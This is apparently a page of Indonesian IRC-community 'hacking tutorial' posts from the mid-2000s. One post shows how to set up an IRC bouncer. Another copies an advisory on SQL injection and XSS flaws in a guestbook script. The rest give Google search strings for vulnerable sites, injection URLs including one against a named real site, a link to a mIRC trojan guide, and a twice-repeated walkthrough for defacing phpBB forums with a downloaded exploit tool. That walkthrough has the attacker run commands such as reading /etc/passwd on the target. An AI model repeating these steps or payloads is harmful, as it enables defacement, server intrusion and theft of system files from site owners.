TUTORIAL HACKER 7


TUTORIAL HACKING
KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet
7
Kumpulan tutorial ini kami persembahkan bagi anda yang ingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ-      Channel: #solohackerlink
-ChanServ-      Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago
-ChanServ-    Successor: POM_PONK << ONLINE >>
-ChanServ-   Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)
-ChanServ-    Last Used: 0 seconds ago
-ChanServ-        Topic: [ http://www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ]
Selamat Menunaikan Ibadah Syaum
-ChanServ-        Email: solohackerlink@gmail.com
-ChanServ-          Url: http://www.solohackerlink.s.to atau http://www.solohackerlink.cool.to
-ChanServ-      Options: TopicLock, SecureOps, Private, SplitOps, Verbose
-ChanServ-    Mode Lock: -i
Membuat BNC
BNC ialah sebuah software untuk koneksi ke mIRC memakai IP shell, sebenarnya hampir
sama dengan proxy, karena sama-sama memakai ip lain dan kelebihan BNC daripadaproxy dia bisa dibuat vhost yang cantik-cantik…
Menginstall BNC
1. wget http://www.igm.web.id/tcl/bnc.tgz
2. tar -zxvf bnc.tgz
3. cd bnc
4. ./configure
edit file bnc.conf
…………………………………….
S: ini adalah password admin
D:7000:5 ini password untuk connect ; 7000 adalah port connect ke bnc; 5 max userbnc
W:1 bila di set 1 ident akan tetap, bila 0 ident berubah
A:1:* host yang di ijinkan memakai bnc ini ; * artinya semua host bisa memakai irc ini
X: default host
V: pilihan host
……………………..
S:…… (isi password)
D:…. :…. : ….
W:1
A:1:*
X: ali.paling.cakep.sedua.be
V: ali.paling.cakep.sedua.be
kalo sudah selesai di edit jalankan perintah : ./bnc bnc.conf
Menjalankan BNC nya…
1. Buka program chat mirc
2. Ketik /server ali.paling.cakep.sedunia.be 7000 (7000 : port bnc anda)
3. Ketik /quote pass
4. Ketik /quote vip
5. Pilih vhost anda dengan cara /quote vip ali.paling.cakep.sedunia.be
6. Masuk ke irc server dengan cara /quote conn irc.cbn.net.id
7. Welcome to AllNetwork – Join #IGM
8. silahkan pake dan join ke channel kesukaanmu
Baca lebih lanjut

TUTORIAL HACKER 6


TUTORIAL HACKING
KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet
6
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking, Defacing,
Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ-      Channel: #solohackerlink
-ChanServ-      Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago
-ChanServ-    Successor: POM_PONK << ONLINE >>
-ChanServ-   Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)
-ChanServ-    Last Used: 0 seconds ago
-ChanServ-        Topic: [ http://www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ] Selamat
Menunaikan Ibadah Syaum
-ChanServ-        Email: solohackerlink@gmail.com
-ChanServ-          Url: http://www.solohackerlink.s.to atau http://www.solohackerlink.cool.to
-ChanServ-      Options: TopicLock, SecureOps, Private, SplitOps, Verbose
-ChanServ-    Mode Lock: -i
phphg
eVuln ID: EV0058
CVE: CVE-2006-0602 CVE-2006-0603 CVE-2006-0604
Vendor: Hinton Design
Vendor´s Web Site: http://www.hintondesign.org
Software: phphg Guestbook Sowtware´s Web Site: http://www.hintondesign.org/downloads/view_cat.php?cat_id=45
Versions: 1.2
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
—————–Description—————
1. Authentication Bypass
Vulnerable script: check.php
There are two ways to bypass authentication:
a) SQL Injection
Variable $HTTP_POST_VARS[username] isn´t properly sanitized before being used in a SQL query. This
can be used to make any SQL query
by injecting arbitrary SQL code.
Condition: magic_quotes_gpc – off
b) Cookie based authentication
check.php script dont make password comparisson when identifying user by cookies
2. Multiple Cross-Site Scripting
Vulnerable script: signed.php
Variables $HTTP_POST_VARS[location] $HTTP_POST_VARS[website] $HTTP_POST_VARS[message]
are not properly sanitized. This can be used
to post arbitrary html or script code.
3. SQL Injections in administrator control panel
Vulnerable scripts:
admin/edit_smilie.php
admin/add_theme.php
admin/ban_ip.php
admin/add_lang
admin/edit_filter
Variable $HTTP_GET_VARS[id] variable isn´t properly sanitized. This can be used to make any SQL query
by injecting arbitrary SQL code.
Condition: magic_quotes_gpc – off Post by : pinguingilo on [ 23 February 2006 10:27:22 ]
Bugs baru tapi pusing ???
keyword : “powered by PLUME CMS”
http://target.com/dir/prepend.php?_PX_config%5Bmanager_path%5D=ijekpakekaki

phorum bugs
Bug : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=injekan
keyword : /phorum/login.php
contoh : http://www.shpl.ru/phorum/plugin/replace/plugin.php?PHORUM%5Bsettings_dir%5D=injekan
Post by : pinguingilo on [ 22 February 2006 10:08:01 ] 2
Membuat Mirc Trojan
tutorial singkat pembuatan mirc trojan silahkan baca disini :
http://www.geocities.com/novitasarita/IRCTrojan.pdf
good luck
Hack Forum Phpbb2 pakai Tool PhpBB_defacer
Kali ini awak coba jelasin cara hack pakai tool PhpBB_defacer.
Langkah pertama siapkan http://www.google.com,cari kata forum phpbb2.
misalkan kita ambil contoh kek ini:http://www.target.com/forum/viewtopic.php?t=XXX
Setelah kita dapet targetnya kita download tool yg akan kita gunakan
untuk mendeface target diatas.
nih alamat web toolna “http://www.indianz.ch/tools/sploits/phpbb_defacer.zip&#8221;
download sampai komplit setelah itu simpan di komputer kamu.
dan jangan lupa di install sekalian.
kalo dah terinstall buka aja tool tersebut dan masukkan alamat web target.
“url:http://www.target.com/forum/viewtopic.php?t=XXX
“Command: (ls -al) (masukkan command unix)
(id)
(cat /etc/passwd)
(find httpd.conf in server)
(pwd)
setelah itu klik icon “RUN” dan tunggu beberapa saat, kalo ada tulisan kek begini
“SORRY NOT VUNLIBITY” coba klik RUN sekali lagi,dan klo tidak bisa lagi cari target yang lain.
Nah supaya tahu kalo target tersebut dapat dieksekusi dengan tool PhpBB_defacer
akan muncul tulisan “username” (isi dengan nick kamu)
kamu ketik hacked oleh:
(Papmahackerlink by: nick kamu)
kemudian klik tulisan Deface dan klik Add
kalo ada tulisan SUCCESS berarti kamu berhasil.
Baca lebih lanjut

TUTORIAL HACKER 5


TUTORIAL HACKING
KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet
5
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- Channel: #solohackerlink
-ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago
-ChanServ- Successor: POM_PONK <>
-ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)
-ChanServ- Last Used: 0 seconds ago
-ChanServ- Topic: [ http://www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ]
Selamat Menunaikan Ibadah Syaum
-ChanServ- Email: solohackerlink@gmail.com
-ChanServ- Url: http://www.solohackerlink.s.to
-ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose
-ChanServ- Mode Lock: -i
Weblog instal Bug
#######################################################################
#
# Indonesian Newbie Class ( Paper )
#
# By iDiots http://idiots.madpage.com
#
# idiots@Amunisi.Info #
#######################################################################
# Weblog instal Bug
#######################################################################
#
# Thank´s For all My Friend at #NeRaka #kartubeben #solohackerlink
# Pa n ma, My brother n siterzzzz
# Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau
ngangkat gw anak..)
#
#######################################################################
( catatan Kata kata Ini di pak lek kopi paste dari artikelnya pak de POM_PONK karna males
ngetik nya… Ho..Hoo..Ho……)
Buat kalian yang ingin belajar BUG disinilah tempatna.
Babahe mo jelasin cara Ebug Website
kita gunakan tradisi seperti yang di lakukan sesepuh hacking kita
yaitu buka http://www.google.com dan masukkan keyword sebagai berikut:
Keyword: allinurl: weblog/install/index.php?lng=*
Baca lebih lanjut

TUTORIAL HACKER 4


TUTORIAL HACKING
KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet
4
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- Channel: #solohackerlink
-ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago
-ChanServ- Successor: POM_PONK <>
-ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)
-ChanServ- Last Used: 0 seconds ago
-ChanServ- Topic: [ http://www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ]
Selamat Menunaikan Ibadah Syaum
-ChanServ- Email: solohackerlink@gmail.com
-ChanServ- Url: http://www.solohackerlink.s.to
-ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose
-ChanServ- Mode Lock: -i
Hack Forum Phpbb2 pakai Tool PhpBB_defacer
Hack Forum Phpbb2 pakai Tool PhpBB_defacer
Kali ini babahe mau jelasin cara hack pakai tool PhpBB_defacer.
Langkah pertama siapkan http://www.google.com,cari kata forum phpbb2.
misalkan kita ambil contoh kek ini:http://www.target.com/forum/viewtopic.php?t=XXX Setelah kita dapet targetna kita download tool yg akan kita gunakan
untuk mendeface target diatas.
nih alamat web toolna “http://www.indianz.ch/tools/sploits/phpbb_defacer.zip&#8221;
download sampi komplit setelah itu simph di komputer kamu.
dan jangan lupa di install sekalian.
kalo dah terinstall buka aja tool tersebut dan masukkan alamat web target.
“url:http://www.target.com/forum/viewtopic.php?t=XXX
“Command: (ls -al) (masukkan command unix)
(id)
(cat /etc/passwd)
(find httpd.conf in server)
(pwd)
setelah itu klik icon “RUN” dan tunggu beberapa saat, kalo ada tulisan kek begini
“SORRY NOT VUNLIBITY” coba klik RUN sekali lagi,dan klo tidak bisa lagi cari target yang lain.
Nah supaya tahu kalo target tersebut dapat dieksekusi dengan tool PhpBB_defacer
akan muncul tulisan “USER NAME” (isi dengan nick kamu)
Your Text ketik Hacked oleh:(SOLOHACKERLINK by: nick kamu)
kemudian klik tulisan Deface dan klik Add
kalo ada tulisan SUCCESS berarti kamu berhasil.
Selamat mencoba
POM_PONK aka STIAWAN
Referensi: http://www.asyiyane.com
Post by : POM_PONK on [ 21 November 2005 15:06:32 ]phpbb.2.0.16.xss+cookies.iDiots
#######################################################################
#
# Indonesian Newbie Class ( Resource Code )
# proxy grabber
# By iDiots http://idiots.madpage.com
#
# idiots@linuxmail.org
#
#######################################################################
# phpbb.2.0.16.xss+cookies.iDiots
#######################################################################
#
# Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink
Baca lebih lanjut

TUTORIAL HACKER 3


TUTORIAL HACKING
KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet
3
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- Channel: #solohackerlink
-ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago
-ChanServ- Successor: POM_PONK <>
-ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003 )
-ChanServ- Last Used: 0 seconds ago
-ChanServ- Topic: [ http://www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ]
Selamat Menunaikan Ibadah Syaum
Baca lebih lanjut

TUTORIAL HACKER 2


TUTORIAL HACKING
KOMUNITAS #SOLOHACKERLINK
Allnet + Dalnet
2
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- — Access List for [#solohackerlink] —
-ChanServ- Num Level Hostmask Since last use
-ChanServ- — —– ——– ————–
-ChanServ- 1 30 CoCoNuT 1h 18m 36s
-ChanServ- 2 20 Shidex 6d 2h 52m 6s
-ChanServ- 3 10 erisanthi 4w 4d 4h 9m 44s
-ChanServ- 4 25 moxff 8h 25m 27s
Baca lebih lanjut